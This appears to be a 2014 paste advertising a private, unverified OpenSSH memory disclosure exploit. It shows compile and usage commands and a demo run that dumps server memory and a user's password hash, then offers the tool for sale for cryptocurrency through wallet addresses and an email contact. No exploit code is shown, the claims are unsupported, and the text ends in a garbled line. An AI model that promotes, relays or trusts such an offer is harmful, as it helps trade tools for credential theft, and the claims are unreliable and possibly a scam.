[EXPLOIT] OpenSSH 5.1-6.X - memory disclosure

a guest
Apr 29th, 2014
#exploit #openssh
░░░░░░ ▓▓▓▓▓▓
░░░░░░░░░░░ ▓▓▓▓▓▓▓▓▓▓▓
░░░░░░░░░░░░░ ▓▓▓▓▓▓▓▓▓▓▓▓▓
░░░░░░░░░░░░░░░░░ ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
░░░░░░░░░░░░░░░░░░░ ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
░░░░░░░░░░░░░░░░░░░░░░ ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
░░░░░░░░░░░░░░░░░░░░░░░░░ ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
░░░░░░░░░░░░░░░░░░░░░░░░░█ ▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
░░░░░░░░░░░░░░░░░░░░░░░░██░░░░░░░░░ ▓▓▓▓▓▓▓▓▓▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
░░░░░░░░░░░░░░░░░░░░█████░░░░░░░░ ▓▓▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
░░░░░░░░░░░░░░░░░▓▓▓█████░░░░░░ ▓▓▓▓▓▓▒▒▒▒▒░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
░░░░░░░░░░░░█▓▓▓▓████░░░░░░░ ▓▓▓▓▓▓▓▒▒▒▒░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓
░░░░░░░░░▓▓▓▓▓▓▓▓▓█░░░░░░ ▓▓▓▓▓▓▒░░░░░░░░▓▓▓▓▓▓▓▓▓▓
░░░▓▓▓▓▓▓▓▓▓▓▓█░░░░░░ ▓▓▓▓▓▓▒░░░░░ ▓▓▓▓▓
▓▓▓▓▓▓▓▓▓▓▓░░░░░░░ ▓▓▓▓▓▓▓░░ ░░░▓
▓▓▓▓▓▓▓╔════════════════════════════════════╕░░░░░▓▓
░░░░░░░░░║ OpenSSH sshd - memory leak │▓▓▓▓▓▓▓▓▓
░░░░░░░░░░║ 5.1-6.X │▓▓▓▓▓▓▓▓▓▓
░░░░░░░░░░░║ (priv8, still unfixed) │▓▓▓▓▓▓▓▓▓▓▓
░░░░░░░ ╙────────────────────────────────────┘ ▓▓▓▓▓▓▓

u mad Heartbleed ? ...

====
Release date: 04/30/2014
Product: OpenSSH
Vendor: http://www.openssh.com/
CVE candidate number: CVE-2018-XXXX (maybe 2020+...)
====

Two years ago we found a memory disclosure vulnerability in the OpenSSH server
which allows data to be remotely extracted from the memory of the sshd server's
child processes.

This exploit abuses a bad check on the network layer of the sshd server,
which we trigger to retrieve all the child processes' memory sections, thereby
allowing us to dump:
- system users' hashes
- keys
- many random things ;)

This exploit was tested on:
- SSH-2.0-OpenSSH_5.1p1 Debian-5
- SSH-2.0-OpenSSH_5.1p1 DragonFly-20080927
- SSH-2.0-OpenSSH_5.2p1 FreeBSD-20090522
- SSH-2.0-OpenSSH_5.5p1 Debian-6+squeeze3
- SSH-2.0-OpenSSH_5.8p1 Debian-7ubuntu1
- SSH-2.0-OpenSSH_6.1p1 Debian-4
- SSH-2.0-OpenSSH_6.2p2-hpn13v14 FreeBSD-openssh-portable-6.2.p2_3,1
- SSH-2.0-OpenSSH_6.4p1 Debian-1~bpo70+1
- SSH-2.0-OpenSSH_6.4p1 FreeBSD-openssh-portable-6.4.p1,1
- SSH-2.0-OpenSSH_6.5p1 CentOS RHEL
- SSH-2.0-OpenSSH_6.6p1 Ubuntu-2ubuntu1
- ... many more

Enough bullshit, POC TIME !

=====

$> ls -lh
total 227K
drwxr-xr-x 2 vjn vjn 4.0K Apr 30 01:53 .
drwxrwxrwt 32 root root 4.0K Apr 30 01:53 ..
-rw-r--r-- 1 vjn vjn 236K Apr 30 01:53 icanhaze.c

$ sha1sum icanhaze.c
d7faeb46f10ea6b7058a116043c1f0ce7a158c7f icanhaze.c

$> gcc icanhaze.c -O3 -lcrypto -lopenbsd-compat -lssl -lssh -lpam -o icanhaze
$> ./icanhaze
+------------------------------+
| OpenSSH 5.1-6.X - infoleak |
| don't evar fuckin release it |
+------------------------------+

Usage: ./icanhaze [OPTIONS]
-h, --host <host>
Hostname or IP
-p, --port <port>
Port number (default: 22)
-d, --dump <dump_file>
Dump output file
-H, --hashes <hashes_file>
User hashes dump file (john)
-v, --verbose
Verbose mode
-D, --debug
Debug mode

Supported architectures: x86, x86_64, armv7
Supported operating systems: Linux, *BSD

$> ./icanhaze -v -h 192.168.10.5 -p 22 -d output.dump -H
+------------------------------+
| OpenSSH 5.1-6.X - infoleak |
| don't evar fuckin release it |
+------------------------------+
[I] - connecting to target 192.168.10.5 on port 22
[I] - sshd banner: SSH-2.0-OpenSSH_6.4p1 Debian-1~bpo70+1
[I] - let magic happenz
[W] - bad luck... retrying
[W] - bad luck... retrying
[W] - bad luck... retrying
[W] - bad luck... retrying
[W] - bad luck... retrying
[W] - bad luck... retrying
[I] - ____STAGE_1____: OK
[I] - mode: x86_64
[I] - pointerz fuckery
[I] - ____STAGE_2____: OK
[I] - fingerprinted child sectionz table
7f863100f000-7f8631010000
7f8631213000-7f8631214000
7f8631418000-7f8631419000
7f863161b000-7f863161c000
7f863181e000-7f863181f000
7f8631a22000-7f8631a23000
7f8631c68000-7f8631c69000
7f8631e6b000-7f8631e6c000
7f863206d000-7f863206e000
7f8632272000-7f8632273000
7f8632475000-7f8632476000
7f863267a000-7f863267b000
7f863287e000-7f863287f000
7f8632a80000-7f8632a81000
7f8632c82000-7f8632c83000
7f8632e84000-7f8632e85000
7f8633092000-7f8633093000
7f8633093000-7f863309f000
7f86332a4000-7f86332a5000
7f86334b0000-7f86334b1000
7f86336bb000-7f86336bc000
7f86338c3000-7f86338c4000
7f8633ad7000-7f8633ad8000
7f8633ad8000-7f8633ada000
7f8633cdd000-7f8633cde000
7f8633ee6000-7f8633ee7000
7f863410e000-7f863410f000
7f863410f000-7f8634110000
7f8634327000-7f8634328000
7f8634328000-7f863432c000
7f863452f000-7f8634530000
7f8634745000-7f8634746000
7f8634746000-7f8634748000
7f8634acc000-7f8634acd000
7f8634acd000-7f8634ad2000
7f8634cd5000-7f8634cd6000
7f8634fa8000-7f8634faa000
7f86351e7000-7f86351e9000
7f86353f1000-7f86353f2000
7f86353f2000-7f8635420000
7f8635636000-7f8635637000
7f8635839000-7f863583a000
7f8635a41000-7f8635a42000
7f8635e13000-7f8635e22000
7f8635e22000-7f8635e26000
7f8636044000-7f8636045000
7f8636045000-7f8636046000
7f8636253000-7f8636254000
7f863645d000-7f863645e000
7f863645e000-7f863645f000
7f863665c000-7f8636666000
7f863667c000-7f863667e000
7f863667f000-7f8636680000
7f8636680000-7f8636681000
7f863690b000-7f863690c000
7f863690c000-7f8636915000
7f86383de000-7f8638441000
7fff42400000-7fff42421000
[I] - dumping (may take some time)
................................/
................................/
................................/
................................/
................................/
................................/
................................/
................................/
................................/
................................-
[I] - dump succeeded
[I] - raw result hexdump:
// cut
000ae5f0 00 00 00 00 00 00 00 00 11 10 00 00 00 00 00 00 |................|
000ae600 4c 69 6e 75 78 20 64 65 62 69 61 6e 2d 6d 61 73 |Linux debian-mas|
000ae610 74 65 72 20 33 2e 31 31 2d 30 2e 62 70 6f 2e 32 |ter 3.11-0.bpo.2|
000ae620 2d 61 6d 64 36 34 20 23 31 20 53 4d 50 20 44 65 |-amd64 #1 SMP De|
000ae630 62 69 61 6e 20 33 2e 31 31 2e 31 30 2d 31 7e 62 |bian 3.11.10-1~b|
000ae640 70 6f 37 30 2b 31 20 28 32 30 31 33 2d 31 32 2d |po70+1 (2013-12-|
000ae650 31 37 29 20 78 38 36 5f 36 34 0a 0a 54 68 65 20 |17) x86_64..The |
000ae660 70 72 6f 67 72 61 6d 73 20 69 6e 63 6c 75 64 65 |programs include|
000ae670 64 20 77 69 74 68 20 74 68 65 20 44 65 62 69 61 |d with the Debia|
000ae680 6e 20 47 4e 55 2f 4c 69 6e 75 78 20 73 79 73 74 |n GNU/Linux syst|
000ae690 65 6d 20 61 72 65 20 66 72 65 65 20 73 6f 66 74 |em are free soft|
000ae6a0 77 61 72 65 3b 0a 74 68 65 20 65 78 61 63 74 20 |ware;.the exact |
000ae6b0 64 69 73 74 72 69 62 75 74 69 6f 6e 20 74 65 72 |distribution ter|
// cut
000bcf10 63 68 61 72 6c 79 00 78 00 31 30 30 30 3a 31 30 |charly.x.1000:10|
000bcf20 30 30 3a 43 68 61 72 6c 79 20 61 64 6d 69 6e 2c |00:Charly admin,|
000bcf30 2c 2c 00 2f 68 6f 6d 65 2f 63 68 61 72 6c 79 00 |,,./home/charly.|
000bcf40 2f 62 69 6e 2f 62 61 73 68 00 00 6f 65 00 2f 75 |/bin/bash..oe./u|
000bcf50 73 72 2f 62 69 6e 2f 7a 73 68 00 00 73 65 00 00 |sr/bin/zsh..se..|
000bcf60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
// cut
000be690 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
000be6a0 ff ff ff ff ff ff ff ff 63 68 61 72 6c 79 00 24 |........charly.$|
000be6b0 36 24 6f 62 6f 67 44 58 78 79 24 73 34 4d 6b 55 |6$obogDXxy$s4MkU|
000be6c0 4c 43 6b 4c 58 2e 66 55 41 35 76 63 70 53 2f 67 |LCkLX.fUA5vcpS/g|
000be6d0 66 4f 30 65 6f 33 2e 42 47 45 48 56 43 4d 74 33 |fO0eo3.BGEHVCMt3|
000be6e0 55 55 57 77 52 46 69 47 6b 7a 4d 52 48 78 53 64 |UUWwRFiGkzMRHxSd|
000be6f0 53 47 45 4f 37 57 31 6a 34 69 64 55 2e 5a 55 55 |SGEO7W1j4idU.ZUU|
000be700 77 62 30 6e 43 6a 44 63 46 64 77 36 32 6f 6c 59 |wb0nCjDcFdw62olY|
000be710 2e 00 31 36 31 39 30 3a 30 3a 39 39 39 39 39 3a |..16190:0:99999:|
000be720 37 3a 3a 3a 00 00 00 00 00 00 00 00 00 00 00 00 |7:::............|
000bf0c0 61 31 2d 39 36 2d 65 74 6d 40 6f 70 65 6e 73 73 |a1-96-etm@openss|
000bf0d0 68 2e 63 6f 6d 2c 68 6d 61 63 2d 6d 64 35 2d 39 |h.com,hmac-md5-9|
000bf0e0 36 2d 65 74 6d 40 6f 70 65 6e 73 73 68 2e 63 6f |6-etm@openssh.co|
000bf0f0 6d 2c 68 6d 61 63 2d 6d 64 35 2c 68 6d 61 63 2d |m,hmac-md5,hmac-|
000bf100 73 68 61 31 2c 75 6d 61 63 2d 36 34 40 6f 70 65 |sha1,umac-64@ope|
000bf110 6e 73 73 68 2e 63 6f 6d 2c 75 6d 61 63 2d 31 32 |nssh.com,umac-12|
000bf120 38 40 6f 70 65 6e 73 73 68 2e 63 6f 6d 2c 68 6d |8@openssh.com,hm|
000bf130 61 63 2d 73 68 61 32 2d 32 35 36 2c 68 6d 61 63 |ac-sha2-256,hmac|
// cut
0024db80 35 33 20 33 61 20 36 35 20 20 7c 4c 41 4e 47 55 |53 3a 65 |LANGU|
0024db90 41 47 45 3d 65 6e 5f 55 53 3a 65 7c 0a 30 30 30 |AGE=en_US:e|.000|
// cut
002516d0 36 39 20 36 66 20 36 65 20 20 7c 65 73 73 69 6f |69 6f 6e |essio|
002516e0 6e 29 3a 20 73 65 73 73 69 6f 6e 7c 0a 30 30 30 |n): session|.000|
002516f0 63 32 61 33 30 20 20 32 30 20 36 66 20 37 30 20 |c2a30 20 6f 70 |
00251700 36 35 20 36 65 20 36 35 20 36 34 20 32 30 20 20 |65 6e 65 64 20 |
00251710 36 36 20 36 66 20 37 32 20 32 30 20 37 35 20 37 |66 6f 72 20 75 7|
00251720 33 20 36 35 20 37 32 20 20 7c 20 6f 70 65 6e 65 |3 65 72 | opene|
00251730 64 20 66 6f 72 20 75 73 65 72 7c 0a 30 30 30 63 |d for user|.000c|
// cut
00251770 20 36 34 20 33 64 20 20 7c 20 63 68 61 72 6c 79 | 64 3d | charly|
00251780 20 62 79 20 28 75 69 64 3d 7c 0a 30 30 30 63 32 | by (uid=|.000c2|
00251790 61 35 30 20 20 33 30 20 32 39 20 30 30 20 30 30 |a50 30 29 00 00|
[I] - System users hashes (1):
charly:$6$obogDXxy$s4MkULCkLX.fUA5vcpS/gfO0eo3.BGEHVCMt3UUWwRFiGkzMRHxSdSGEO7W1j4idU.ZUUwb0nCjDcFdw62olY.:16190:0:99999:7:::
[I] - Done, exiting...

$>

=====
Since we detected a few exploitation attempts against this vulnerability through
our honeypot network, we concluded that another team / organization
discovered it and decided to sell it.
(Yes, we build honeypot rules for our exploits)

We don't have access to exploit black markets and we are now happy to offer
it for sale to you, both black and white hats.

== How to buy ==
Send 66666.6 BC (Blackcoin) to BLkrmaoY7XQfUUCSCJfHGq8tTig5qJmZXT
or
2000000 WC (Whitecoin) to Wbi8SqBjymeedtNwM9zhaSm3bMnZvgifR2
or
20 BTC (Bitcoin) to 14PEL35LQf81oCvSPurhoyTSvosvtQT7u3

then send your transaction ID by mail to olckrrii3@openmailbox.org and we will
send you the download link and password. (PGP recommended)

icanhaze.c sha1:d7faeb46f10ea6b7058a116043c1f0ce7a158c7f

Please note that we are busy and we will NOT answer questions, social
engineering attempts or dumb comments. The price is non-negotiable.
==

Some terabytes of custom pintool and ASAN traces give us many other
vulnerabilities to dig into and work to do; see you soon for some news about:
- BIND
- Nginx
- Apache HTTPd

. 1\-5\61\-J\48/a \~£\3|2\D6\ %%!%}).
R.